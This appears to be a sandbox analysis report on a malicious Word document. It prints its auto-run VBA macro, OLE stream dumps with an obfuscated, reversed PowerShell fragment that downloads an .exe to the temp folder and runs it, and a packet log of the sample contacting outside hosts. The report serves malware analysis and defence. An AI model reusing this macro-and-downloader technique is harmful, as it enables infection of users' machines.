Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()


Dim RgeJIsB As Byte
RgeJIsB = 126
Dim q4H2mwp56 As Boolean
q4H2mwp56 = False

Dim v7bBxp As Byte
v7bBxp = 148
i9900k
End Sub

VBA File Name: fm.frm, Stream Size: 1152

General
Stream Path:	VBA/fm
VBA File Name:	fm.frm
Stream Size:	1152
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 77 13 0e 8e 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "fm"
Attribute VB_Base = "0{38DFB29E-5608-4364-9A9B-0D444F94F45E}{023AECA8-FFDA-47EE-8FAE-2CF97F0B7C44}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 576

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	576
Entropy:	5.41567952296
Base64 Encoded:	True
Data ASCII:	I D = " { 1 E 6 D D 8 1 6 - 6 6 E 7 - 4 3 E 2 - A 0 1 7 - 6 6 C 2 F 9 8 E 6 3 E F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e x F a B P . . M o d u l e = I v H p l . . M o d u l e = R C U z h . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = f m . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G
Data Raw:	49 44 3d 22 7b 31 45 36 44 44 38 31 36 2d 36 36 45 37 2d 34 33 45 32 2d 41 30 31 37 2d 36 36 43 32 46 39 38 45 36 33 45 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 78 46 61 42 50 0d 0a 4d 6f 64 75 6c 65 3d 49 76 48 70 6c 0d 0a 4d 6f 64 75 6c 65 3d 52 43 55 7a 68 0d 0a 50 61 63 6b 61

Stream Path: PROJECTwm, File Type: data, Stream Size: 110

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	110
Entropy:	3.67155789503
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e x F a B P . N . e . x . F . a . B . P . . . I v H p l . I . v . H . p . l . . . R C U z h . R . C . U . z . h . . . f m . f . m . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 78 46 61 42 50 00 4e 00 65 00 78 00 46 00 61 00 42 00 50 00 00 00 49 76 48 70 6c 00 49 00 76 00 48 00 70 00 6c 00 00 00 52 43 55 7a 68 00 52 00 43 00 55 00 7a 00 68 00 00 00 66 6d 00 66 00 6d 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3914

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3914
Entropy:	4.56818748916
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 af 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1668

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	1668
Entropy:	4.39792756348
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . - . . . . . D . b . . : / . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . .
Data Raw:	93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 118

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	118
Entropy:	2.14496741631
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . 1 . . . . . . . . . . . . . . . p . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 31 03 00 00 00 00 00 00 31 08 00 00 00 00 00 00 08 00 00 00 00 00 01 00 70 00 00 7f 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 304

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	304
Entropy:	2.29666421023
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . 4 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 a1 07 00 00 00 00 00 00 c9 07 00 00 00 00 00 00 09 08 00 00 00 00 00 00 09 00 00 00 01 00 02 00 79 07 00 00 00 00 00 00 08 00 0d 00 34 00 00 00 31 08 00 00 00 00 00 00 61 00 00 00 00 00

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 103

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	103
Entropy:	2.16020154321
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 04 60 00 00 f1 06 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 928

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	928
Entropy:	6.60898897867
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . < . r ^ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
Data Raw:	01 9c b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 3c 8a 72 5e 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: fm/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	fm/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: fm/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 285

General
Stream Path:	fm/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	285
Entropy:	4.5675047018
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } f m . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 3 0 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 5 0 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . .
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 66 6d 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 33 30 33 30 0d

Stream Path: fm/f, File Type: data, Stream Size: 90

General
Stream Path:	fm/f
File Type:	data
Stream Size:	90
Entropy:	2.79992309498
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . . . . . . . . . m o n d a y . . 4 . . . . . . .
Data Raw:	00 04 20 00 08 0c 00 0c 01 00 00 00 02 00 00 00 00 7d 00 00 6b 1f 00 00 e1 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 06 00 00 80 01 00 00 00 e8 03 00 00 00 00 17 00 6d 6f 6e 64 61 79 00 00 34 02 00 00 1a 01 00 00

Stream Path: fm/o, File Type: data, Stream Size: 1000

General
Stream Path:	fm/o
File Type:	data
Stream Size:	1000
Entropy:	5.45313793003
Base64 Encoded:	True
Data ASCII:	. . . . . . @ . . . . . . H . , . . . . . . . . { . . . ; ) D 5 y 4 3 W F j $ ( x e i ; ' ' = p c H w i $ ; ) f H E Y P $ , ' 0 0 0 ' ( e c a l p e r . ' } } { h c t a c } ; k a e r b ; 1 m t A H d K s G $ s s e c 0 0 0 o r p - t r 0 0 0 a t s ; ) 1 m t A H d K s G $ , ) ( g n i r t 0 0 0 S o T . V L 4 Y J $ ( e l i 0 0 0 f d a 0 0 0 o l n 0 0 0 w o d . L k 9 V C k $ { y r t { ) J B V H L i N e i $ n i V L 4 Y J $ ( h c a e 0 0 0 r o f ; " \\ e 0 0 0 x e . 9 2 2 \\ p 0 0 0 m e t \\ s w o d 0 0 0
Data Raw:	00 02 c8 03 01 01 40 80 00 00 00 00 1b 48 80 2c ad 03 00 80 ec 09 00 00 7b 02 00 00 3b 29 44 35 79 34 33 57 46 6a 24 28 78 65 69 3b 27 27 20 3d 20 70 63 48 77 69 24 3b 29 66 48 45 59 50 24 20 2c 27 30 30 30 27 28 65 63 61 6c 70 65 72 2e 27 7d 7d 7b 68 63 74 61 63 7d 3b 6b 61 65 72 62 3b 31 6d 74 41 48 64 4b 73 47 24 20 73 73 65 63 30 30 30 6f 72 70 2d 74 72 30 30 30 61 74 73 3b 29

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 21, 2019 14:01:25.765724897 CET	51176	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:25.880289078 CET	53	51176	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:25.934727907 CET	49223	443	192.168.1.16	92.53.98.31
Mar 21, 2019 14:01:25.990418911 CET	443	49223	92.53.98.31	192.168.1.16
Mar 21, 2019 14:01:25.990534067 CET	49223	443	192.168.1.16	92.53.98.31
Mar 21, 2019 14:01:26.140853882 CET	49223	443	192.168.1.16	92.53.98.31
Mar 21, 2019 14:01:26.196372032 CET	443	49223	92.53.98.31	192.168.1.16
Mar 21, 2019 14:01:26.196415901 CET	443	49223	92.53.98.31	192.168.1.16
Mar 21, 2019 14:01:26.209486961 CET	49224	443	192.168.1.16	92.53.98.31
Mar 21, 2019 14:01:26.268810987 CET	443	49224	92.53.98.31	192.168.1.16
Mar 21, 2019 14:01:26.272356987 CET	49224	443	192.168.1.16	92.53.98.31
Mar 21, 2019 14:01:26.273581028 CET	49224	443	192.168.1.16	92.53.98.31
Mar 21, 2019 14:01:26.333523035 CET	443	49224	92.53.98.31	192.168.1.16
Mar 21, 2019 14:01:26.333570004 CET	443	49224	92.53.98.31	192.168.1.16
Mar 21, 2019 14:01:26.521301031 CET	49810	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:26.600132942 CET	53	49810	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:26.602349043 CET	49225	80	192.168.1.16	90.156.201.98
Mar 21, 2019 14:01:26.660986900 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.661106110 CET	49225	80	192.168.1.16	90.156.201.98
Mar 21, 2019 14:01:26.661782980 CET	49225	80	192.168.1.16	90.156.201.98
Mar 21, 2019 14:01:26.716361046 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.716404915 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.716425896 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.716445923 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.716465950 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.716480970 CET	80	49225	90.156.201.98	192.168.1.16
Mar 21, 2019 14:01:26.717514992 CET	49225	80	192.168.1.16	90.156.201.98
Mar 21, 2019 14:01:26.740336895 CET	55151	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:26.808345079 CET	53	55151	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:26.810559988 CET	49226	443	192.168.1.16	92.53.96.93
Mar 21, 2019 14:01:26.872030973 CET	443	49226	92.53.96.93	192.168.1.16
Mar 21, 2019 14:01:26.872451067 CET	49226	443	192.168.1.16	92.53.96.93
Mar 21, 2019 14:01:26.876889944 CET	49226	443	192.168.1.16	92.53.96.93
Mar 21, 2019 14:01:26.938355923 CET	443	49226	92.53.96.93	192.168.1.16
Mar 21, 2019 14:01:26.938404083 CET	443	49226	92.53.96.93	192.168.1.16
Mar 21, 2019 14:01:26.945278883 CET	49227	443	192.168.1.16	92.53.96.93
Mar 21, 2019 14:01:27.003407001 CET	443	49227	92.53.96.93	192.168.1.16
Mar 21, 2019 14:01:27.003576994 CET	49227	443	192.168.1.16	92.53.96.93
Mar 21, 2019 14:01:27.004523993 CET	49227	443	192.168.1.16	92.53.96.93
Mar 21, 2019 14:01:27.063046932 CET	443	49227	92.53.96.93	192.168.1.16
Mar 21, 2019 14:01:27.063159943 CET	443	49227	92.53.96.93	192.168.1.16
Mar 21, 2019 14:01:27.088644028 CET	53216	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:27.116884947 CET	53	53216	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:27.119332075 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.180088043 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.182343006 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.183000088 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.243233919 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243279934 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243302107 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243324041 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243345022 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243365049 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243391037 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243433952 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243459940 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.243475914 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243500948 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243525028 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.243586063 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.303745031 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303777933 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303800106 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303823948 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303832054 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.303862095 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303878069 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303901911 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303925991 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303947926 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303973913 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.303997993 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.304018974 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.304027081 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.304224014 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.364618063 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364717960 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364768028 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364798069 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364824057 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364849091 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364860058 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.364876032 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364901066 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364927053 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364952087 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.364975929 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.365000963 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.365025997 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.365050077 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.365075111 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.365099907 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.365222931 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.425376892 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425460100 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425486088 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425508022 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425529957 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425554991 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425579071 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425602913 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425626993 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425651073 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425673008 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425695896 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425698996 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.425719976 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425744057 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425776958 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.425935030 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.486212015 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486258984 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486282110 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486304045 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486335039 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486346006 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486370087 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486394882 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486418962 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486433029 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.486440897 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486464977 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486488104 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486514091 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486540079 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486563921 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486576080 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.486588001 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486609936 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486630917 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486707926 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.486771107 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486794949 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.486855984 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.546952963 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.546998024 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547019005 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547039032 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547061920 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547084093 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547106028 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547127008 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547157049 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547169924 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547180891 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547202110 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547224045 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547247887 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547271013 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547292948 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547312975 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547324896 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.547333956 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547355890 CET	80	49228	78.155.218.207	192.168.1.16
